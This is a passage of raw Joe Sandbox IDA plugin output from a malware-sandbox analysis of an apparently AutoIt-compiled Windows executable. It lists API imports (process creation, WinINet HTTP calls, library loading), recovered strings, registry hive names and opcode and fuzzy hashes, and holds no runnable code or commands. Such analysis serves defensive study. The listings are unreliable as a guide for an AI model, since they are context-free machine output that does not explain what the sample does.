                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                    • API String ID: 1256254125-909552448
                                                                                                    • Opcode ID: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
                                                                                                    • Instruction ID: 79e1a1e8ef10d396728ac4626a540eac3ad9546544b83b75be4aa1ed6b820797
                                                                                                    • Opcode Fuzzy Hash: 79e3de7ea057186b5b56dd668669cb8998a435ba4a065050321b7abd2a631523
                                                                                                    • Instruction Fuzzy Hash: 4971143360013A8BCB20DE7CED515BE3BD1EF65754B2505A8F86E97288EA35CD4583A0
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00B3835A
                                                                                                    • _wcslen.LIBCMT ref: 00B3836E
                                                                                                    • _wcslen.LIBCMT ref: 00B38391
                                                                                                    • _wcslen.LIBCMT ref: 00B383B4
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B383F2
                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B35BF2), ref: 00B3844E
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38487
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B384CA
                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B38501
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00B3850D
                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B3851D
                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00B35BF2), ref: 00B3852C
                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B38549
                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B38555
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                    • API String ID: 799131459-1154884017
                                                                                                    • Opcode ID: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
                                                                                                    • Instruction ID: dfffb13f4189ad98b1e1a2abc5ae5a877a2663d978d20cfab76abba7aafa3e8b
                                                                                                    • Opcode Fuzzy Hash: 09340dcf26eddd2cb59835af932ef2413c64fb7faee89553634e0f066b1bbce1
                                                                                                    • Instruction Fuzzy Hash: FF61B071540315BAEB14DF64CC85BBE7BA8FB18B11F204689F815E61D1DF74A984CBA0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                    • API String ID: 0-1645009161
                                                                                                    • Opcode ID: c839f0bb1ceb01a20da926b485da7825d8200044d895a29658bcc31a9526c1ac
                                                                                                    • Instruction ID: 8dbea50abb69914d29e20ed40b8853977e1cc17df4de729d1b759e88f74a9a81
                                                                                                    • Opcode Fuzzy Hash: c839f0bb1ceb01a20da926b485da7825d8200044d895a29658bcc31a9526c1ac
                                                                                                    • Instruction Fuzzy Hash: 5E81E071A04605BBDB20BF61DD42FBF3BA8AF16300F144068F905AB1E2EB74DA51D7A1
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000063), ref: 00B05A2E
                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B05A40
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B05A57
                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00B05A6C
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B05A72
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00B05A82
                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00B05A88
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B05AA9
                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B05AC3
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B05ACC
                                                                                                    • _wcslen.LIBCMT ref: 00B05B33
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00B05B6F
                                                                                                    • GetDesktopWindow.USER32 ref: 00B05B75
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B05B7C
                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00B05BD3
                                                                                                    • GetClientRect.USER32(?,?), ref: 00B05BE0
                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00B05C05
                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B05C2F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 895679908-0
                                                                                                    • Opcode ID: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
                                                                                                    • Instruction ID: 55e0f34dcd3ec3d68e8cb1b7528f755a139f81548483d271a8adf626d2bec9e2
                                                                                                    • Opcode Fuzzy Hash: b2d45f339abeae7d27845a061069970e28eef44f9a7b4d3da57a7d986c9b0d40
                                                                                                    • Instruction Fuzzy Hash: 1A712B31A00A09AFDB20DFA8CE85AAFBFF5FB48704F104558E546A39A0DB75A944CF50
                                                                                                    APIs
                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00AC00C6
                                                                                                      • Part of subcall function 00AC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B7070C,00000FA0,E3ACFBB1,?,?,?,?,00AE23B3,000000FF), ref: 00AC011C
                                                                                                      • Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0127
                                                                                                      • Part of subcall function 00AC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AE23B3,000000FF), ref: 00AC0138
                                                                                                      • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00AC014E
                                                                                                      • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AC015C
                                                                                                      • Part of subcall function 00AC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AC016A
                                                                                                      • Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC0195
                                                                                                      • Part of subcall function 00AC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AC01A0
                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00AC00E7
                                                                                                      • Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9
                                                                                                    Strings
                                                                                                    • SleepConditionVariableCS, xrefs: 00AC0154
                                                                                                    • InitializeConditionVariable, xrefs: 00AC0148
                                                                                                    • kernel32.dll, xrefs: 00AC0133
                                                                                                    • WakeAllConditionVariable, xrefs: 00AC0162
                                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AC0122
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                    • API String ID: 66158676-1714406822
                                                                                                    • Opcode ID: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
                                                                                                    • Instruction ID: 3880327048e2ebea9f22216e6ad0ffcf3baa7dba3986164c54bb48260e8a4762
                                                                                                    • Opcode Fuzzy Hash: 1bbcc0dddaee409825f7902dcbe6d59c1b8750ccc0e2ba66051c94a336f1eddf
                                                                                                    • Instruction Fuzzy Hash: DC21A732A44711EBD7116BA4AD09F7E77E8EB05B51F26063EF815B72A1DFB49C008B90
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                    • API String ID: 176396367-1603158881
                                                                                                    • Opcode ID: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
                                                                                                    • Instruction ID: ed097928b575314d7df5907ebfa460d98f3720301f5d6b45491e59897201bcae
                                                                                                    • Opcode Fuzzy Hash: 3304d2ec3669d875fce7249e1a0e438f22c86789875a23589470944de72796ad
                                                                                                    • Instruction Fuzzy Hash: DBE1F532A005169BCB24DF64C899BEEBFF8FF54B10F548199E456B72D0DB30AE858790
                                                                                                    APIs
                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00B3CC08), ref: 00B14527
                                                                                                    • _wcslen.LIBCMT ref: 00B1453B
                                                                                                    • _wcslen.LIBCMT ref: 00B14599
                                                                                                    • _wcslen.LIBCMT ref: 00B145F4
                                                                                                    • _wcslen.LIBCMT ref: 00B1463F
                                                                                                    • _wcslen.LIBCMT ref: 00B146A7
                                                                                                      • Part of subcall function 00ABF9F2: _wcslen.LIBCMT ref: 00ABF9FD
                                                                                                    • GetDriveTypeW.KERNEL32(?,00B66BF0,00000061), ref: 00B14743
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                    • Opcode ID: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
                                                                                                    • Instruction ID: d89c382d928050e8b52ef93eb7a63cc2c8ef6a6611395bba3f80d18af6e703e6
                                                                                                    • Opcode Fuzzy Hash: 7fdde14c8a9eb356641981b2ccb4df47b67447d2c4a5e150859b724f95434336
                                                                                                    • Instruction Fuzzy Hash: 31B1F1316083029FC710DF28C991AAEB7E5EFA6764F94499DF496C7291D730DC84CBA2
                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 00B2B198
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1B0
                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B1D4
                                                                                                    • _wcslen.LIBCMT ref: 00B2B200
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B214
                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B2B236
                                                                                                    • _wcslen.LIBCMT ref: 00B2B332
                                                                                                      • Part of subcall function 00B105A7: GetStdHandle.KERNEL32(000000F6), ref: 00B105C6
                                                                                                    • _wcslen.LIBCMT ref: 00B2B34B
                                                                                                    • _wcslen.LIBCMT ref: 00B2B366
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B2B3B6
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00B2B407
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B2B439
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B2B44A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B2B45C
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B2B46E
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B2B4E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2178637699-0
                                                                                                    • Opcode ID: f0fcb80eec50325fb143484c590b1fccbfb025c28266ab174ed6d3784d7bc82d
                                                                                                    • Instruction ID: 7bb0d90baac72f899d86f1c56d07e021cd3dc3e932dbd2bc492e1bceb44c5645
                                                                                                    • Opcode Fuzzy Hash: f0fcb80eec50325fb143484c590b1fccbfb025c28266ab174ed6d3784d7bc82d
                                                                                                    • Instruction Fuzzy Hash: 46F169315043109FCB15EF24D991B6EBBE5EF85314F18899DF8999B2A2DB31EC40CB52
                                                                                                    APIs
                                                                                                    • GetMenuItemCount.USER32(00B71990), ref: 00AE2F8D
                                                                                                    • GetMenuItemCount.USER32(00B71990), ref: 00AE303D
                                                                                                    • GetCursorPos.USER32(?), ref: 00AE3081
                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00AE308A
                                                                                                    • TrackPopupMenuEx.USER32(00B71990,00000000,?,00000000,00000000,00000000), ref: 00AE309D
                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AE30A9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 36266755-4108050209
                                                                                                    • Opcode ID: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
                                                                                                    • Instruction ID: d874314966aa69529ed1ed9fde3d7ee3c27e2e8a13a025e3f45928f66591bd03
                                                                                                    • Opcode Fuzzy Hash: 53c636a7106255b1649bdd638409ccdeed1321de92df765a09bdb956e4c14962
                                                                                                    • Instruction Fuzzy Hash: 73710631640255BEEB259F69CC49FAABF78FF05324F204216F5156B1E0CBB1AD64CB90
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,?), ref: 00B36DEB
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B36E5F
                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B36E81
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36E94
                                                                                                    • DestroyWindow.USER32(?), ref: 00B36EB5
                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B36EE4
                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B36EFD
                                                                                                    • GetDesktopWindow.USER32 ref: 00B36F16
                                                                                                    • GetWindowRect.USER32(00000000), ref: 00B36F1D
                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B36F35
                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B36F4D
                                                                                                      • Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                    • String ID: 0$tooltips_class32
                                                                                                    • API String ID: 2429346358-3619404913
                                                                                                    • Opcode ID: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
                                                                                                    • Instruction ID: 23d329f0bf3936f2e9353836023f19859ba634ebdf3f3ed0c3463d5e82146b74
                                                                                                    • Opcode Fuzzy Hash: e7861b2365d6f6b7966be562d362c2d5b3c1828061f89bf1fe8bfa479ff60593
                                                                                                    • Instruction Fuzzy Hash: C1716974144244AFDB21CF18DC44FAABBE9FB89304F24485DFA9997261CB70A94ACB21
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 00B39147
                                                                                                      • Part of subcall function 00B37674: ClientToScreen.USER32(?,?), ref: 00B3769A
                                                                                                      • Part of subcall function 00B37674: GetWindowRect.USER32(?,?), ref: 00B37710
                                                                                                      • Part of subcall function 00B37674: PtInRect.USER32(?,?,00B38B89), ref: 00B37720
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B391B0
                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B391BB
                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B391DE
                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B39225
                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00B3923E
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00B39255
                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 00B39277
                                                                                                    • DragFinish.SHELL32(?), ref: 00B3927E
                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B39371
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                    • API String ID: 221274066-3440237614
                                                                                                    • Opcode ID: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
                                                                                                    • Instruction ID: 3cc201f291b4bc4e08255ece6cac06a3900c96fdf1379a679e24b4e154aae94b
                                                                                                    • Opcode Fuzzy Hash: 81f72e75f5f3d484438bfe3116d9d4603f6f209606aae2a865cb6454c95880f0
                                                                                                    • Instruction Fuzzy Hash: 77618B71108301AFD701EFA4CD85DAFBBE8EF89750F10495DF595932A0DB709A49CB62
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C4B0
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C4C3
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C4D7
                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00B1C4F0
                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00B1C533
                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00B1C549
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C554
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C584
                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00B1C5DC
                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00B1C5F0
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B1C5FB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                    • Opcode ID: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
                                                                                                    • Instruction ID: bb39406c25a659e4cb6109f8dd77e7a99d9ef54157da8f8eb21655ff052abddd
                                                                                                    • Opcode Fuzzy Hash: fa123d51ce03974958a3aaa61aaf0699a3cd684db2dedd6d9dbaa4b5ba9b23a6
                                                                                                    • Instruction Fuzzy Hash: 775139B1540208BFEB218FA4C989ABB7FFDFB18754F504459F945E7210DB34EA889B60
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00B38592
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00B385A2
